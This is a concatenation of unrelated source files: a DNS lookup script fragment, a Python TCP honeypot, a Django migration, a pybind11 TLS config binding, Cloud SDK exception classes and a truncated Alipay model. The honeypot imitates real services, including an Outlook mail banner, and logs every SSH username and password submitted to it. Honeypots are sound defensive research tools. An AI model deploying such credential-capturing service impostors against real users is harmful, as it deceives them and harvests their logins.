else:
return [main_domain, []], 'FALSE'
else:
# print '域名: %s, 异常原因:%s' % (domain, rrset)
return [main_domain, []], rrset
if __name__ == '__main__':
domain = 'badoo.com'
print get_domain_ns_hierarchical_dns(domain, offline=True, tld_server='192.26.92.30') #offline模式
domain = 'baidu.com'
print get_domain_ns_hierarchical_dns(domain) # online模式
|
[
"[email protected]"
] | |
523d5763c3761db28717450f17064f87a208f479
|
24df103bec759d7052cbb2c4d7cf3407986d9371
|
/tcp-honeypot.py
|
889eb33c6597ed7ca0c50b22e5b3ce916127cb27
|
[] |
no_license
|
ntung/Beta
|
ef9b3f8036b14bcd481dc0a4662ea1e8a12dee2a
|
3c864fe0c5bd4ed80dac030db6d22b16006754d7
|
refs/heads/master
| 2020-06-11T19:05:36.523562 | 2019-05-31T16:36:16 | 2019-05-31T16:36:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 24,438 |
py
|
#!/usr/bin/env python
__description__ = 'TCP honeypot'
__author__ = 'Didier Stevens'
__version__ = '0.0.5'
__date__ = '2019/05/30'
"""
Source code put in public domain by Didier Stevens, no Copyright
https://DidierStevens.com
Use at your own risk
History:
2018/03/08: start
2018/03/09: continue
2018/03/17: continue, added ssl
2018/03/22: 0.0.2 added ssh
2018/08/26: 0.0.3 added randomness when selecting a matching regular expression
2018/09/09: added support for listeners via arguments
2018/12/23: 0.0.4 added THP_SPLIT
2019/03/12: added error handling
2019/04/10: THP_STARTSWITH and THP_ELSE
2019/05/30: 0.0.5 added File2String
Todo:
"""
THP_REFERENCE = 'reference'
THP_SSL = 'ssl'
THP_CERTFILE = 'certfile'
THP_KEYFILE = 'keyfile'
THP_SSLCONTEXT = 'sslcontext'
THP_SSH = 'ssh'
THP_BANNER = 'banner'
THP_REPLY = 'reply'
THP_MATCH = 'match'
THP_LOOP = 'loop'
THP_REGEX = 'regex'
THP_STARTSWITH = 'startswith'
THP_ELSE = 'else'
THP_ACTION = 'action'
THP_DISCONNECT = 'disconnect'
THP_SPLIT = 'split'
#Terminate With CR LF
def TW_CRLF(data):
if isinstance(data, str):
data = [data]
return '\r\n'.join(data + [''])
dListeners = {
22: {THP_BANNER: TW_CRLF('SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2')},
2222: {THP_REFERENCE: 22},
2200: {THP_SSH: {THP_KEYFILE: 'test_rsa.key', THP_BANNER: 'SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2'},
THP_BANNER: TW_CRLF('Last login: Thu Mar 22 18:10:31 2018 from 192.168.1.1') + 'root@vps:~# ',
THP_REPLY: '\r\nroot@vps:~# ',
THP_LOOP: 10
},
443: {THP_SSL: {THP_CERTFILE: 'cert-20180317-161753.crt', THP_KEYFILE: 'key-20180317-161753.pem'},
THP_REPLY: TW_CRLF(['HTTP/1.1 200 OK', 'Date: %TIME_GMT_RFC2822%', 'Server: Apache', 'Last-Modified: Wed, 06 Jul 2016 17:51:03 GMT', 'ETag: "59652-cfd-edc33a50bfec6"', 'Accept-Ranges: bytes', 'Content-Length: 285', 'Connection: close', 'Content-Type: text/html; charset=UTF-8', '', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">', '<link rel="icon" type="image/png" href="favicon.png"/>', '<html>', ' <head>', ' <title>Home</title>', ' <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">', ' </head>', ' <body>Welcome home!</body>', '</html>'])
},
8443: {THP_REFERENCE: 443},
80: {THP_REPLY: TW_CRLF(['HTTP/1.1 200 OK', 'Date: %TIME_GMT_RFC2822%', 'Server: Apache', 'Last-Modified: Wed, 06 Jul 2016 17:51:03 GMT', 'ETag: "59652-cfd-edc33a50bfec6"', 'Accept-Ranges: bytes', 'Content-Length: 285', 'Connection: close', 'Content-Type: text/html; charset=UTF-8', '', '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">', '<link rel="icon" type="image/png" href="favicon.png"/>', '<html>', ' <head>', ' <title>Home</title>', ' <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">', ' </head>', ' <body>Welcome home!</body>', '</html>'])},
591: {THP_REFERENCE: 80},
8008: {THP_REFERENCE: 80},
8080: {THP_REFERENCE: 80},
25: {THP_LOOP: 10,
THP_BANNER: TW_CRLF('220 HP1EUR02TC012.mail.protection.outlook.com Microsoft ESMTP MAIL Service ready at %TIME_GMT_RFC2822%'),
THP_MATCH: {
'EHLO': {THP_REGEX: '^[Ee][Hh][Ll][Oo]', THP_REPLY: TW_CRLF(['250-HP1EUR02TC012.mail.protection.outlook.com', '250-PIPELINING', '250-SIZE 20971520', '250-ETRN', '250-ENHANCEDSTATUSCODES', '250 8BITMIME'])},
'default': {THP_REGEX: '^.', THP_REPLY: TW_CRLF('500 5.5.2 Error: bad syntax')},
}
},
11211: {THP_LOOP: 10,
THP_MATCH: {
'stats': {THP_REGEX: '^stats', THP_REPLY: TW_CRLF(['STAT pid 14868', 'STAT uptime 175931', 'STAT time %TIME_GMT_EPOCH%', 'STAT version 1.5.4', 'STAT id C3B806AA71F0887773210E75DD12BDAD', 'STAT pointer_size 32', 'STAT rusage_user 620.299700', 'STAT rusage_system 1545.703017', 'STAT curr_items 228', 'STAT total_items 779', 'STAT bytes 15525', 'STAT curr_connections 92', 'STAT total_connections 1740', 'STAT connection_structures 165', 'STAT cmd_get 7411', 'STAT cmd_set 28445156', 'STAT get_hits 5183', 'STAT get_misses 2228', 'STAT evictions 0', 'STAT bytes_read 2112768087', 'STAT bytes_written 1000038245', 'STAT limit_maxbytes 52428800', 'STAT threads 1', 'END'])},
'version': {THP_REGEX: '^version', THP_REPLY: TW_CRLF('VERSION 1.5.4')},
'get': {THP_REGEX: '^get ', THP_REPLY: TW_CRLF(['VALUE a 0 2', 'AA', 'END'])},
'set': {THP_REGEX: '^set ', THP_REPLY: TW_CRLF('STORED')},
'quit': {THP_REGEX: '^quit', THP_ACTION: THP_DISCONNECT},
}
},
21: {THP_LOOP: 10,
THP_BANNER: TW_CRLF('220 FTP server ready. All transfers are logged. (FTP) [no EPSV]'),
THP_MATCH: {
'user': {THP_REGEX: '^USER ', THP_REPLY: TW_CRLF('331 Please specify the password.')},
'pass': {THP_REGEX: '^PASS ', THP_REPLY: TW_CRLF('230 Login successful.')},
'typea': {THP_REGEX: '^TYPE A', THP_REPLY: TW_CRLF('200 Switching to ASCII mode.')},
'auth': {THP_REGEX: '^AUTH', THP_REPLY: TW_CRLF('530 Please login with USER and PASS.')},
'pasv': {THP_REGEX: '^PASV', THP_REPLY: TW_CRLF('227 Entering Passive Mode (121)')},
'help': {THP_REGEX: '^HELP', THP_REPLY: TW_CRLF(['220 FTP server ready. All transfers are logged. (FTP) [no EPSV]', '530 Please login with USER and PASS.'])},
}
},
121: {},
}
import optparse
import socket
import select
import threading
import time
import re
import ssl
import textwrap
import sys
import random
import traceback
import binascii
import struct
try:
import paramiko
except:
pass
def PrintManual():
manual = r'''
Manual:
TCP listeners are configured with Python dictionary dListeners. The key is the port number (integer) and the value is another dictionary (listener dictionary).
When this listener dictionary is empty, the honeypot will accept TCP connections on the configured port, perform a single read and then close the connection.
The listener can be configured to perform more than one read: add key THP_LOOP to the dictionary with an integer as value. The integer specifies the maximum number of reads.
A banner can be transmitted before the first read, this is done by adding key THP_BANNER to the dictionary with a string as the value (the banner).
The listener can be configured to send a reply after each read, this is done by adding key THP_REPLY to the dictionary with a string as the value (the reply).
To increase the interactivity of the honeypot, keywords can be defined with replies. This is done by adding a new dictionary to the dictionary with key THP_MATCH.
Entries in this match dictionary are regular expressions (THP_REGEX): when a regular expression matches read data, the corresponding reply is send or action performed (e.g. disconnect).
If more than one regular expression matches, then the longest matching is selected. If there is more than one longest match (e.g. equal length), then one is selected at random.
A listener can be configured to accept SSL/TLS connections by adding key THP_SSL to the listener dictionary with a dictionary as value specifying the certificate (THP_CERTFILE) and key (THP_KEYFILE) to use. If an SSL context can not be created (for example because of missing certificate file), the listener will fallback to TCP.
A listener can be configured to accept SSH connections by adding key THP_SSH to the listener dictionary with a dictionary as value specifying the key (THP_KEYFILE) to use. This requires Python module paramiko, the listener will fallback to TCP if this module is missing.
When several ports need to behave the same, the dictionary can just contain a reference (THP_REFERENCE) to the port which contains the detailed description.
Helper function TW_CRLF (Terminate With CR/LF) can be used to format replies and banners.
Replies and banners can contain aliases: %TIME_GMT_RFC2822% and %TIME_GMT_EPOCH%, they will be instantiated when a reply is transmitted.
Output is written to stdout and a log file.
This tool has several command-line options, and can take listeners as arguments. These arguments are filenames of Python programs that define listeners.
It is written for Python 2.7 and was tested on Windows 10, Ubuntu 16 and CentOS 6.
'''
for line in manual.split('\n'):
print(textwrap.fill(line, 79))
#Convert 2 Bytes If Python 3
def C2BIP3(string):
if sys.version_info[0] > 2:
return bytes([ord(x) for x in string])
else:
return string
#Convert 2 Integer If Python 2
def C2IIP2(data):
if sys.version_info[0] > 2:
return data
else:
return ord(data)
# CIC: Call If Callable
def CIC(expression):
if callable(expression):
return expression()
else:
return expression
# IFF: IF Function
def IFF(expression, valueTrue, valueFalse):
if expression:
return CIC(valueTrue)
else:
return CIC(valueFalse)
def File2String(filename):
try:
f = open(filename, 'rb')
except:
return None
try:
return f.read()
except:
return None
finally:
f.close()
def FormatTime(epoch=None):
if epoch == None:
epoch = time.time()
return '%04d%02d%02d-%02d%02d%02d' % time.localtime(epoch)[0:6]
class cOutput():
def __init__(self, filename=None, bothoutputs=False):
self.filename = filename
self.bothoutputs = bothoutputs
if self.filename and self.filename != '':
self.f = open(self.filename, 'w')
else:
self.f = None
def Line(self, line):
if not self.f or self.bothoutputs:
print(line)
if self.f:
try:
self.f.write(line + '\n')
self.f.flush()
except:
pass
def LineTimestamped(self, line):
self.Line('%s: %s' % (FormatTime(), line))
def Exception(self):
self.LineTimestamped('Exception occured:')
if not self.f or self.bothoutputs:
traceback.print_exc()
if self.f:
try:
traceback.print_exc(file=self.f)
self.f.flush()
except:
pass
def Close(self):
if self.f:
self.f.close()
self.f = None
def ReplaceAliases(data):
data = data.replace('%TIME_GMT_RFC2822%', time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime()))
data = data.replace('%TIME_GMT_EPOCH%', str(int(time.time())))
return data
def ParseNumber(number):
if number.startswith('0x'):
return int(number[2:], 16)
else:
return int(number)
def MyRange(begin, end):
if begin < end:
return range(begin, end + 1)
elif begin == end:
return [begin]
else:
return range(begin, end - 1, -1)
def ParsePorts(expression):
ports = []
for portrange in expression.split(','):
result = portrange.split('-')
if len(result) == 1:
ports.append(ParseNumber(result[0]))
else:
ports.extend(MyRange(ParseNumber(result[0]), ParseNumber(result[1])))
return ports
def ModuleLoaded(name):
return name in sys.modules
if ModuleLoaded('paramiko'):
class cSSHServer(paramiko.ServerInterface):
def __init__(self, oOutput, connectionID):
self.oEvent = threading.Event()
self.oOutput = oOutput
self.connectionID = connectionID
def check_channel_request(self, kind, chanid):
if kind == 'session':
return paramiko.OPEN_SUCCEEDED
return paramiko.OPEN_FAILED_ADMINISTRATIVELY_PROHIBITED
def check_auth_password(self, username, password):
self.oOutput.LineTimestamped('%s SSH username: %s' % (self.connectionID, username))
self.oOutput.LineTimestamped('%s SSH password: %s' % (self.connectionID, password))
return paramiko.AUTH_SUCCESSFUL
def get_allowed_auths(self, username):
return 'password'
def check_channel_shell_request(self, channel):
self.oEvent.set()
return True
def check_channel_pty_request(self, channel, term, width, height, pixelwidth, pixelheight, modes):
return True
def SplitIfRequested(dListener, data):
if THP_SPLIT in dListener:
return [part for part in data.split(dListener[THP_SPLIT]) if part != '']
else:
return [data]
class ConnectionThread(threading.Thread):
global dListeners
def __init__(self, oSocket, oOutput, options):
threading.Thread.__init__(self)
self.oSocket = oSocket
self.oOutput = oOutput
self.options = options
self.connection = None
self.connectionID = None
def run(self):
oSocketConnection, address = self.oSocket.accept()
self.connectionID = '%s:%d-%s:%d' % (self.oSocket.getsockname() + address)
oSocketConnection.settimeout(self.options.timeout)
self.oOutput.LineTimestamped('%s connection' % self.connectionID)
dListener = dListeners[self.oSocket.getsockname()[1]]
if THP_REFERENCE in dListener:
dListener = dListeners[dListener[THP_REFERENCE]]
try:
oSSLConnection = None
oSSLContext = dListener.get(THP_SSLCONTEXT, None)
oSSHConnection = None
oSSHFile = None
if oSSLContext != None:
oSSLConnection = oSSLContext.wrap_socket(oSocketConnection, server_side=True)
self.connection = oSSLConnection
elif dListener.get(THP_SSH, None) != None:
if ModuleLoaded('paramiko'):
if THP_KEYFILE in dListener[THP_SSH]:
oRSAKey = paramiko.RSAKey(filename=dListener[THP_SSH][THP_KEYFILE])
else:
oRSAKey = paramiko.RSAKey.generate(1024)
self.oOutput.LineTimestamped('%s SSH generated RSA key' % self.connectionID)
oTransport = paramiko.Transport(oSocketConnection)
if THP_BANNER in dListener[THP_SSH]:
oTransport.local_version = dListener[THP_SSH][THP_BANNER]
oTransport.load_server_moduli()
oTransport.add_server_key(oRSAKey)
oSSHServer = cSSHServer(self.oOutput, self.connectionID)
try:
oTransport.start_server(server=oSSHServer)
except paramiko.SSHException:
self.oOutput.LineTimestamped('%s SSH negotiation failed' % self.connectionID)
raise
self.oOutput.LineTimestamped('%s SSH banner %s' % (self.connectionID, oTransport.remote_version))
oSSHConnection = oTransport.accept(20)
if oSSHConnection is None:
self.oOutput.LineTimestamped('%s SSH no channel' % self.connectionID)
raise
self.oOutput.LineTimestamped('%s SSH authenticated' % self.connectionID)
oSSHServer.oEvent.wait(10)
if not oSSHServer.oEvent.is_set():
self.oOutput.LineTimestamped('%s SSH no shell' % self.connectionID)
raise
self.connection = oSSHConnection
oSSHFile = oSSHConnection.makefile('rU')
else:
self.oOutput.LineTimestamped('%s can not create SSH server, Python module paramiko missing' % self.connectionID)
self.connection = oSocketConnection
else:
self.connection = oSocketConnection
if THP_BANNER in dListener:
self.connection.send(ReplaceAliases(dListener[THP_BANNER]))
self.oOutput.LineTimestamped('%s send banner' % self.connectionID)
for i in range(0, dListener.get(THP_LOOP, 1)):
if oSSHFile == None:
data = self.connection.recv(self.options.readbuffer)
else:
data = oSSHFile.readline()
self.oOutput.LineTimestamped('%s data %s' % (self.connectionID, repr(data)))
for splitdata in SplitIfRequested(dListener, data):
if splitdata != data:
self.oOutput.LineTimestamped('%s splitdata %s' % (self.connectionID, repr(splitdata)))
if THP_REPLY in dListener:
self.connection.send(ReplaceAliases(dListener[THP_REPLY]))
self.oOutput.LineTimestamped('%s send reply' % self.connectionID)
if THP_MATCH in dListener:
dKeys = {}
for item in dListener[THP_MATCH].items():
for key in item[1].keys():
dKeys[key] = 1 + dKeys.get(key, 0)
if THP_REGEX in dKeys and THP_STARTSWITH in dKeys:
self.oOutput.LineTimestamped('THP_MATCH cannot contain both THP_REGEX and THP_STARTSWITH!')
elif THP_REGEX in dKeys:
matches = []
for matchname, dMatch in dListener[THP_MATCH].items():
if THP_REGEX in dMatch:
oMatch = re.search(dMatch[THP_REGEX], splitdata)
if oMatch != None:
matches.append([len(oMatch.group()), dMatch, matchname])
if self.ProcessMatches(matches, dListener):
break
elif THP_STARTSWITH in dKeys:
matches = []
for matchname, dMatch in dListener[THP_MATCH].items():
if THP_STARTSWITH in dMatch and splitdata.startswith(dMatch[THP_STARTSWITH]):
matches.append([len(dMatch[THP_STARTSWITH]), dMatch, matchname])
if self.ProcessMatches(matches, dListener):
break
#a# is it necessary to close both oSSLConnection and oSocketConnection?
if oSSLConnection != None:
oSSLConnection.shutdown(socket.SHUT_RDWR)
oSSLConnection.close()
oSocketConnection.shutdown(socket.SHUT_RDWR)
oSocketConnection.close()
self.oOutput.LineTimestamped('%s closed' % self.connectionID)
except socket.timeout:
self.oOutput.LineTimestamped('%s timeout' % self.connectionID)
except Exception as e:
self.oOutput.LineTimestamped("%s exception '%s'" % (self.connectionID, str(e)))
def ProcessMatches(self, matches, dListener):
result = False
if matches == []:
for matchname, dMatch in dListener[THP_MATCH].items():
if THP_ELSE in dMatch:
matches.append([0, dMatch, THP_ELSE])
if matches != []:
matches = sorted(matches, reverse=True)
longestmatches = [match for match in matches if match[0] == matches[0][0]]
longestmatch = random.choice(longestmatches)
dMatchLongest = longestmatch[1]
if THP_REPLY in dMatchLongest:
self.connection.send(ReplaceAliases(dMatchLongest[THP_REPLY]))
self.oOutput.LineTimestamped('%s send %s reply' % (self.connectionID, longestmatch[2]))
if dMatchLongest.get(THP_ACTION, '') == THP_DISCONNECT:
self.oOutput.LineTimestamped('%s disconnecting' % self.connectionID)
result = True
return result
def TCPHoneypot(filenames, options):
global dListeners
oOutput = cOutput('tcp-honeypot-%s.log' % FormatTime(), True)
for filename in filenames:
oOutput.LineTimestamped('Exec: %s' % filename)
execfile(filename, globals())
if ModuleLoaded('paramiko'):
paramiko.util.log_to_file('tcp-honeypot-ssh-%s.log' % FormatTime())
if options.ports != '':
oOutput.LineTimestamped('Ports specified via command-line option: %s' % options.ports)
dListeners = {}
for port in ParsePorts(options.ports):
dListeners[port] = {}
if options.extraports != '':
oOutput.LineTimestamped('Extra ports: %s' % options.extraports)
for port in ParsePorts(options.extraports):
dListeners[port] = {}
sockets = []
for port in dListeners.keys():
if THP_SSL in dListeners[port]:
context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
try:
context.load_cert_chain(certfile=dListeners[port][THP_SSL][THP_CERTFILE], keyfile=dListeners[port][THP_SSL][THP_KEYFILE])
dListeners[port][THP_SSLCONTEXT] = context
oOutput.LineTimestamped('Created SSL context for %d' % port)
except IOError as e:
if '[Errno 2]' in str(e):
oOutput.LineTimestamped('Error reading certificate and/or key file: %s %s' % (dListeners[port][THP_SSL][THP_CERTFILE], dListeners[port][THP_SSL][THP_KEYFILE]))
else:
oOutput.LineTimestamped('Error creating SSL context: %s' % e)
oOutput.LineTimestamped('SSL not enabled for %d' % port)
oSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
oSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
oSocket.bind((options.address, port))
except socket.error as e:
if '[Errno 98] Address already in use' in str(e):
oOutput.LineTimestamped('Port %d can not be used, it is already open' % port)
continue
elif '[Errno 99] Cannot assign requested address' in str(e) or '[Errno 10049] The requested address is not valid in its context' in str(e):
oOutput.LineTimestamped('Address %s can not be used (port %d)' % (options.address, port))
continue
elif '[Errno 10013] An attempt was made to access a socket in a way forbidden by its access permissions' in str(e):
oOutput.LineTimestamped('Port %d can not be used, access is forbidden' % port)
continue
else:
raise e
oSocket.listen(5)
oOutput.LineTimestamped('Listening on %s %d' % oSocket.getsockname())
sockets.append(oSocket)
if sockets == []:
return
while True:
readables, writables, exceptionals = select.select(sockets, [], [])
for oSocket in readables:
try:
ConnectionThread(oSocket, oOutput, options).start()
except:
oOutput.Exception()
def Main():
moredesc = '''
Source code put in the public domain by Didier Stevens, no Copyright
Use at your own risk
https://DidierStevens.com'''
oParser = optparse.OptionParser(usage='usage: %prog [options]\n' + __description__ + moredesc, version='%prog ' + __version__)
oParser.add_option('-m', '--man', action='store_true', default=False, help='Print manual')
oParser.add_option('-t', '--timeout', type=int, default=10, help='Timeout value for sockets in seconds (default 10s)')
oParser.add_option('-r', '--readbuffer', type=int, default=10240, help='Size read buffer in bytes (default 10240)')
oParser.add_option('-a', '--address', default='0.0.0.0', help='Address to listen on (default 0.0.0.0)')
oParser.add_option('-P', '--ports', default='', help='Ports to listen on (overrides ports configured in the program)')
oParser.add_option('-p', '--extraports', default='', help='Extra ports to listen on (default none)')
(options, args) = oParser.parse_args()
if options.man:
oParser.print_help()
PrintManual()
return
TCPHoneypot(args, options)
if __name__ == '__main__':
Main()
|
[
"[email protected]"
] | |
613442e4334b7b1c405168b18116068806fdff41
|
c86cb4e5e036a4a591acb8683c9e7023b657fdfe
|
/breathecode/admissions/migrations/0006_auto_20200703_1951.py
|
a4d6b94f4dc09df601bd0054def34615ce51c921
|
[] |
no_license
|
Joshfishman97/apiv2
|
0fe6c01cb63fafcbaf772ea2fee4b549694d3abf
|
aee21638748caf7abbd7543bcde95ef74e0bbb7c
|
refs/heads/master
| 2023-08-29T09:21:51.635903 | 2021-10-11T19:52:40 | 2021-10-11T19:52:40 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 518 |
py
|
# Generated by Django 3.0.7 on 2020-07-03 19:51
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('admissions', '0005_auto_20200703_1752'),
]
operations = [
migrations.RemoveField(
model_name='cohort',
name='online_room_url',
),
migrations.AlterField(
model_name='cohort',
name='ending_date',
field=models.DateTimeField(blank=True, null=True),
),
]
|
[
"[email protected]"
] | |
38429a573b65366bc1e423cace706d35a5c44f7e
|
b806f99e96dc6782e5983fa1e3e0df5957cee122
|
/src/asiopal/TLSConfig.h
|
90550300caabce45b51257e55711e58b8b01cfcd
|
[
"Apache-2.0"
] |
permissive
|
garretfick/pydnp3
|
db1b29e7b1416a102abceaa322a3f9da1336fa55
|
54f7e791bf86a5122e8b734e9d8d64882796cadc
|
refs/heads/master
| 2023-04-06T08:33:59.335065 | 2019-11-30T02:08:45 | 2019-11-30T02:08:45 | 174,612,654 | 4 | 1 |
Apache-2.0
| 2023-03-27T09:39:27 | 2019-03-08T21:31:10 |
Python
|
UTF-8
|
Python
| false | false | 4,996 |
h
|
/*
* -*- coding: utf-8 -*- {{{
* vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
*
* Copyright 2018, Kisensum.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* Neither Kisensum, nor any of its employees, nor any jurisdiction or
* organization that has cooperated in the development of these materials,
* makes any warranty, express or implied, or assumes any legal liability
* or responsibility for the accuracy, completeness, or usefulness or any
* information, apparatus, product, software, or process disclosed, or
* represents that its use would not infringe privately owned rights.
* Reference herein to any specific commercial product, process, or service
* by trade name, trademark, manufacturer, or otherwise does not necessarily
* constitute or imply its endorsement, recommendation, or favoring by Kisensum.
* }}}
*/
#ifndef PYDNP3_ASIOPAL_TLSCONFIG_H
#define PYDNP3_ASIOPAL_TLSCONFIG_H
#include <pybind11/pybind11.h>
#include <Python.h>
#include <asiopal/TLSConfig.h>
#ifdef PYDNP3_ASIOPAL
namespace py = pybind11;
using namespace std;
void bind_TLSConfig(py::module &m)
{
// ----- struct: asiopal:::TLSConfig -----
py::class_<asiopal::TLSConfig>(m, "TLSConfig",
"TLS configuration information.")
.def(
py::init<const std::string&, const std::string&, const std::string&, int, bool, bool, bool, const std::string&>(),
" Construct a TLS configuration. \n"
":param peerCertFilePath: Certificate file used to verify the peer or server. Can be CA file or a "
"self-signed cert provided by other party. \n"
":param localCertFilePath: File that contains the certificate (or certificate chain) that will be "
"presented to the remote side of the connection \n"
":param privateKeyFilePath: File that contains the private key corresponding to the local certificate \n"
":param maxVerifyDepth: The maximum certificate chain verification depth (0 == self-signed only) \n"
":param allowTLSv10: Allow TLS version 1.0 (default false) \n"
":param allowTLSv11: Allow TLS version 1.1 (default false) \n"
":param allowTLSv12: Allow TLS version 1.2 (default true) \n"
":param cipherList: The openssl cipher-list, defaults to empty string which does not modify the default "
"cipher list \n"
"localCertFilePath and privateKeyFilePath can optionally be the same file, i.e. a PEM that contains both "
"pieces of data.",
py::arg("peerCertFilePath"),
py::arg("localCertFilePath"),
py::arg("privateKeyFilePath"),
py::arg("maxVerifyDepth") = 0,
py::arg("allowTLSv10") = false,
py::arg("allowTLSv11") = false,
py::arg("allowTLSv12") = false,
py::arg("cipherList") = ""
)
.def_readwrite(
"peerCertFilePath",
&asiopal::TLSConfig::peerCertFilePath,
"Certificate file used to verify the peer or server. Can be CA file or a self-signed cert provided "
"by other party."
)
.def_readwrite(
"localCertFilePath",
&asiopal::TLSConfig::localCertFilePath,
"File that contains the certificate (or certificate chain) that will be presented to the remote side "
"of the connection."
)
.def_readwrite(
"privateKeyFilePath",
&asiopal::TLSConfig::privateKeyFilePath,
"File that contains the private key corresponding to the local certificate."
)
.def_readwrite(
"maxVerifyDepth",
&asiopal::TLSConfig::maxVerifyDepth,
"Max verification depth (defaults to 0 - peer certificate only)."
)
.def_readwrite(
"allowTLSv10",
&asiopal::TLSConfig::allowTLSv10,
"Allow TLS version 1.0 (default false)."
)
.def_readwrite(
"allowTLSv11",
&asiopal::TLSConfig::allowTLSv11,
"Allow TLS version 1.1 (default false)."
)
.def_readwrite(
"allowTLSv12",
&asiopal::TLSConfig::allowTLSv12,
"Allow TLS version 1.2 (default true)."
)
.def_readwrite(
"cipherList",
&asiopal::TLSConfig::cipherList,
"Openssl format cipher list"
);
}
#endif // PYDNP3_ASIOPAL
#endif
|
[
"[email protected]"
] | |
7a775527cc467edc8a9e6c6269de9ab5c023c3e2
|
23611933f0faba84fc82a1bc0a85d97cf45aba99
|
/google-cloud-sdk/.install/.backup/lib/googlecloudsdk/core/exceptions.py
|
f84acc69f0dc89dfaf69055e8503fad1847a0204
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
KaranToor/MA450
|
1f112d1caccebdc04702a77d5a6cee867c15f75c
|
c98b58aeb0994e011df960163541e9379ae7ea06
|
refs/heads/master
| 2021-06-21T06:17:42.585908 | 2020-12-24T00:36:28 | 2020-12-24T00:36:28 | 79,285,433 | 1 | 1 |
Apache-2.0
| 2020-12-24T00:38:09 | 2017-01-18T00:05:44 |
Python
|
UTF-8
|
Python
| false | false | 3,353 |
py
|
# Copyright 2014 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base exceptions for the Cloud SDK."""
import os
from googlecloudsdk.core.util import platforms
class _Error(Exception):
"""A base exception for all Cloud SDK errors.
This exception should not be used directly.
"""
pass
class InternalError(_Error):
"""A base class for all non-recoverable internal errors."""
pass
class Error(_Error):
"""A base exception for all user recoverable errors.
Any exception that extends this class will not be printed with a stack trace
when running from CLI mode. Instead it will be shows with a message of how
the user can correct this problem.
All exceptions of this type must have a message for the user.
"""
def __init__(self, *args, **kwargs):
"""Initialize a core.Error.
Args:
*args: positional args for exceptions.
**kwargs: keyword args for exceptions, and additional arguments:
- exit_code: int, The desired exit code for the CLI.
"""
super(Error, self).__init__(*args)
self.exit_code = kwargs.get('exit_code', 1)
class MultiError(Error):
"""Collection of Error instances as single exception."""
def __init__(self, errors):
super(MultiError, self).__init__(', '.join(str(e) for e in errors))
class RequiresAdminRightsError(Error):
"""An exception for when you don't have permission to modify the SDK.
This tells the user how to run their command with administrator rights so that
they can perform the operation.
"""
def __init__(self, sdk_root):
message = (
u'You cannot perform this action because you do not have permission '
u'to modify the Google Cloud SDK installation directory [{root}].\n\n'
.format(root=sdk_root))
if (platforms.OperatingSystem.Current() ==
platforms.OperatingSystem.WINDOWS):
message += (
'Click the Google Cloud SDK Shell icon and re-run the command in '
'that window, or re-run the command with elevated privileges by '
'right-clicking cmd.exe and selecting "Run as Administrator".')
else:
# Specify the full path because sudo often uses secure_path and won't
# respect the user's $PATH settings.
gcloud_path = os.path.join(sdk_root, 'bin', 'gcloud')
message += (
u'Re-run the command with sudo: sudo {0} ...'.format(gcloud_path))
super(RequiresAdminRightsError, self).__init__(message)
class NetworkIssueError(Error):
"""An error to wrap a general network issue."""
def __init__(self, message):
super(NetworkIssueError, self).__init__(
'{message}\n'
'This may be due to network connectivity issues. Please check your '
'network settings, and the status of the service you are trying to '
'reach.'.format(message=message))
|
[
"[email protected]"
] | |
132d3a611c7577d20741d725a2e5be24f6cd955a
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/domain/AnttechBlockchainSignIndexCreateModel.py
|
b024cf20674b77a37b1eb383bfa79e53e90aa35b
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 |
Apache-2.0
| 2023-04-25T04:54:02 | 2018-05-14T09:40:54 |
Python
|
UTF-8
|
Python
| false | false | 6,540 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AnttechBlockchainSignIndexCreateModel(object):
def __init__(self):
self._app_name = None
self._biz_corp = None
self._biz_from = None
self._biz_scene = None
self._biz_unique_key = None
self._open_id = None
self._principal_id = None
self._principal_type = None
self._sign_version = None
self._tenant = None
self._valid_end_date = None
self._valid_start_date = None
@property
def app_name(self):
return self._app_name
@app_name.setter
def app_name(self, value):
self._app_name = value
@property
def biz_corp(self):
return self._biz_corp
@biz_corp.setter
def biz_corp(self, value):
self._biz_corp = value
@property
def biz_from(self):
return self._biz_from
@biz_from.setter
def biz_from(self, value):
self._biz_from = value
@property
def biz_scene(self):
return self._biz_scene
@biz_scene.setter
def biz_scene(self, value):
self._biz_scene = value
@property
def biz_unique_key(self):
return self._biz_unique_key
@biz_unique_key.setter
def biz_unique_key(self, value):
